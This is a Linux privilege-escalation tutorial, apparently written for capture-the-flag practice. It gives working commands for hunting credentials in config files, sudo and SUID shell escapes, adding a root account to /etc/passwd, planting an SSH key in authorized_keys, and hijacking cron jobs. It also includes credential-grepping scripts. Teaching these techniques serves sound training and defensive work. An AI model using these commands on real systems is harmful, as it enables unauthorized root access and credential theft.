Privilege Elevation - Unix

You just got shell access to a server. Let's start with an exhaustive inventory of what your account can reach.

  • Identify the OS, its version and the missing security patches
  • List the available tools: netcat, python, perl...
  • Read all config, temporary and backup files, looking for logins and passwords.
  • Use any sudo rights of the account.
  • Find commands with the SetUID bit set.
  • Find a process running in the background as root and tamper with its inputs.
  • Find a kernel exploit. This last option is radical, because it can crash the machine, but it is very effective on old, unpatched servers...

On your first servers, it is better to run these enumeration commands by hand, so that you get familiar with their options and output. Once you are comfortable and know what you are looking for, feel free to use scripts that do the enumeration for you.

Files containing useful information

Find .txt or .cfg files that are readable and owned by another account (GNU find; drop the -user test to include your own files):

find /home -readable -type f ! -user "$(id -un)" \( -iname \*.txt -o -iname \*.cfg \) 2>/dev/null

The same search with a regular expression; -regextype is GNU find syntax, BSD find wants -E before the path instead:

find /home -readable -type f -regextype posix-extended -regex '.*\.(txt|cfg)$' 2>/dev/null

Wordpress config file is:

wp-config.php

Let's find it:

find /var -name wp-config.php 2>/dev/null

This config file contains the login and password used to connect to the blog database. By dumping the database you can then recover the WordPress users' logins and password hashes, to crack or to try elsewhere on the box.

The Apache config file is named:

httpd.conf
apache2.conf

It is usually found in one of these directories:

/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf

The Tomcat config file is named:

server.xml

User accounts, often with clear-text passwords, are in:

tomcat-users.xml

Those files are usually found in:

TOMCAT-HOME/conf/
/usr/local/tomcat/conf/
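As an added example (not part of the original page), the file hunting above in one pass: a POSIX shell script that lists readable config-style files under the given roots and greps them for credential-looking lines. It assumes GNU find (-readable) and GNU grep/xargs; the name patterns and the regex are my choices, not an exhaustive list.

```sh
#!/bin/sh
# Added example (not part of the original page): one pass over the file
# hunting described above. Assumptions: GNU find (-readable) and GNU
# grep/xargs; the name patterns and the credential regex are my choices,
# not an exhaustive list.

# Print readable regular files under the given roots whose name looks like a
# config, backup or well-known application file (wp-config.php, tomcat-users.xml...).
find_cred_files() {
  find "$@" -type f -readable \
    \( -iname '*.txt' -o -iname '*.cfg' -o -iname '*.conf' -o -iname '*.ini' \
       -o -iname '*.env' -o -iname '*.bak' -o -iname '*.old' -o -iname '*~' \
       -o -iname 'wp-config.php' -o -iname 'tomcat-users.xml' -o -iname 'server.xml' \
       -o -iname 'httpd.conf' -o -iname 'apache2.conf' \) 2>/dev/null
}

# Print "file:line:text" for lines that look like a credential assignment:
# password/passwd/secret/api_key (plus a possible suffix such as _key), an
# optional closing quote, then = : or , which covers key=value, key: value,
# XML attributes and PHP define('DB_PASSWORD', '...'). Newlines are turned
# into NULs so that file names with spaces survive the trip through xargs.
grep_secrets() {
  find_cred_files "$@" | tr '\n' '\0' \
    | xargs -0 -r grep -HinE "(passw(or)?d|secret|api[_-]?key)[A-Za-z_]*['\"]?[[:space:]]*[=:,]" 2>/dev/null
}

# usage: grep_secrets /var/www /home /etc /opt /tmp
```

Run it against the web roots and home directories first; the hit list is short enough to read by hand, which is the point of filtering on file names before grepping.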

Sudo

Sudo runs a command as another user, root by default.

To see the sudo rights of your account, run sudo -l. Depending on the configuration, you may be asked for your password first.

sudo -l
User user1 may run the following commands on target-host:
    (ALL) NOPASSWD: /usr/bin/find
    (user2) NOPASSWD: /usr/bin/python3 /home/user2/run.py

The first entry is: (ALL) NOPASSWD: /usr/bin/find
/usr/bin/find can be run as any user of the server, root included, without a password:

sudo /usr/bin/find

The second entry is: (user2) NOPASSWD: /usr/bin/python3 /home/user2/run.py
Here the exact command '/usr/bin/python3 /home/user2/run.py' can be run as user2 only. Select that user with the '-u user2' flag:

sudo -u user2 /usr/bin/python3 /home/user2/run.py

With the NOPASSWD tag you are not asked for a password. Otherwise sudo asks for the password of the current account, which you do not know if you came in through a webshell or an SSH key; you will have to find it before those entries are of any use. Also check whether the script run as user2 (or a module directory it imports from) is writable by you: if so, you control what runs as user2. From a webshell, use sudo -n (non-interactive) so that sudo fails immediately instead of hanging on a password prompt nobody will answer.

SetUID bit

Identify binaries with the setUID bit set (they run with the privileges of their owner, usually root):

find / -type f -perm -4000 -exec ls -al {} \; 2>/dev/null

What can you do with a binary that has the setUID bit?

- Run a shell
- Read a flag
- Copy a file
- Add an entry in a file : /etc/sudoers, /etc/passwd, ~/.ssh/authorized_keys
- ...

SUID/Sudo exploitation

Many programs can launch a shell, which is perfect when they run through sudo or carry the setUID bit.

- find
- nmap
- vi
- less
- awk
- tee
...

Reference: https://gtfobins.github.io/

less is used to read files. Press q to exit.

./less flag.txt

To open a shell from less, open a file, then type !/bin/sh at the prompt (if the spawned shell drops the effective UID, see the note on bash -p below and spawn /bin/bash -p instead):

./less file
!/bin/sh

When bash starts with an effective UID that differs from the real UID (the setUID case), it resets the effective UID to the real one and the privilege is lost. The -p option keeps it, so from a setUID binary always start the shell with -p. Under sudo both UIDs are already root and this does not apply.

bash -p

With find, match any file that exists, then run a shell for it; -quit stops after the first match so you get a single shell instead of one per match. The -p flag is honoured by bash; if your /bin/sh does not accept it, call /bin/bash -p instead.

sudo /usr/bin/find . -name readme.txt -exec /bin/sh \; -quit
./find . -name readme.txt -exec /bin/sh -p \; -quit

If you can write to /etc/passwd (for example through tee run with sudo as root), you can become root: append an entry with UID 0 (root's UID). The classic one-liner leaves the password field empty; some PAM configurations refuse empty passwords on su, in which case put a real hash in that field instead (the output of openssl passwd -6, for example).

echo 'myroot::0:0:::/bin/bash' | sudo tee -a /etc/passwd
su myroot

The same idea works with SSH: if you can write to a user's ~/.ssh/authorized_keys (directly or through a privileged tee), append your public key and log in with the matching private key. Use >> rather than > so that the existing keys, and the legitimate access, are left untouched.

echo 'ssh-rsa AAAAB3[...]CHN2CpQ== yolo@yolospacehacker.com' >> /home/victim/.ssh/authorized_keys
ssh -i id_rsa victim@iptarget

Process exploitation

ps

Identify the processes running as root (USER column), with the parent/child tree:

ps auxf

Once you have found an interesting process, check whether you can modify the files it reads (configs, scripts, libraries, sockets) and whether its version has known vulnerabilities.

Identify cron tasks. /var/spool/cron is normally readable by root only, so an error there is expected.

cat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly
crontab -l
cat /var/spool/cron/* /var/spool/cron/crontabs/* 2>/dev/null
systemctl list-timers --all
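What you are really looking for in those crontabs is a root job whose script you can edit, or whose script is missing from a directory you can write to. As an added example (not from the original page), a small POSIX shell script that parses system-crontab text and flags exactly those two cases. It assumes the /etc/crontab layout (m h dom mon dow user command, or @reboot user command) and only inspects the first word of each command; the crontab lines in the usage are constructed.

```sh
#!/bin/sh
# Added example (not from the original page): parse system-crontab text and
# flag commands the current user could tamper with. Assumptions: lines use the
# /etc/crontab layout "m h dom mon dow user command" (or "@reboot user command"),
# and only the first word of the command is examined.

# stdin: crontab text; stdout: the command path of each job, one per line.
# Comments, blank lines and VAR=value assignments are skipped.
cron_commands() {
  awk '!/^[[:space:]]*(#|$)/ && !/^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ {
         if ($1 ~ /^@/) print $3; else print $7 }'
}

# stdin: crontab text; stdout: "WRITABLE path" when the script itself can be
# modified, "MISSING-IN-WRITABLE-DIR path" when the job points at a file that
# does not exist but whose directory we can write to (plant it), nothing
# otherwise. Relative commands are skipped: they depend on cron's PATH,
# which is a separate check.
writable_cron_targets() {
  cron_commands | while read -r p; do
    case "$p" in /*) ;; *) continue ;; esac
    if [ -w "$p" ]; then
      echo "WRITABLE $p"
    elif [ ! -e "$p" ] && [ -w "$(dirname "$p")" ]; then
      echo "MISSING-IN-WRITABLE-DIR $p"
    fi
  done
}

# usage: cat /etc/crontab /etc/cron.d/* 2>/dev/null | writable_cron_targets
```

Feed it everything you could read in the previous step; a WRITABLE hit on a root job means your code runs as root at the next tick, without touching sudo or SUID binaries at all.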

With ps you may miss a short-lived process: a job launched every 2 minutes that processes a batch file in 5 seconds and disappears. The pspy tool watches the process list for you (it polls /proc and needs no root privileges).

https://github.com/DominicBreuker/pspy

Kernel exploit

Linux distribution and version (/etc/os-release holds the same information in a machine-readable form):

cat /etc/issue
Ubuntu 18.04.3 LTS

Linux kernel version (here 5.0.0-37-generic):

uname -a
Linux yoloctf-server 5.0.0-37-generic #40~18.04.1-Ubuntu SMP Thu Nov 14 12:06:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Once the kernel version is known, it is possible to search for a kernel exploit:
https://github.com/SecWiki/linux-kernel-exploits
Never run an unknown binary!
Get the sources, read them, understand what they do, compile them yourself, and only then run them, knowing that there is a high risk of crashing the server. Also check that the target is really unpatched: distributions backport fixes, so the version string alone does not prove the kernel is vulnerable.

Enumeration scripts

Some well-known scripts automate the enumeration process.
Test them and find the one that suits you best.

LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
LinEnum.sh: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
linuxprivchecker.py: https://github.com/sleventyeleven/linuxprivchecker
unix-privesc-check: https://github.com/pentestmonkey/unix-privesc-check
lse.sh: https://github.com/diego-treitos/linux-smart-enumeration